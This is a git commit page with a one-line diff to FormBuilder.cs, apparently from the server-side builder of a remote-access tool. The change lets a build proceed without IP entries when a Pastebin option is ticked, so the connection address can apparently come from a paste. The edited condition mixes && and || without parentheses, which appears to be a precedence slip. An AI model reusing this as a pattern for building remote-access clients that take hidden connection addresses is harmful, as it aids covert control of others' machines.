Update FormBuilder.cs

This commit is contained in:
NYAN CAT 2019-06-17 19:06:41 +03:00
parent b9bd9dfe40
commit e3105b4516

View File

@ -173,7 +173,7 @@ namespace Server.Forms
private async void BtnBuild_Click(object sender, EventArgs e) private async void BtnBuild_Click(object sender, EventArgs e)
{ {
if (listBoxIP.Items.Count == 0 || listBoxPort.Items.Count == 0) return; if (!chkPastebin.Checked && listBoxIP.Items.Count == 0 || listBoxPort.Items.Count == 0) return;
if (checkBox1.Checked) if (checkBox1.Checked)
{ {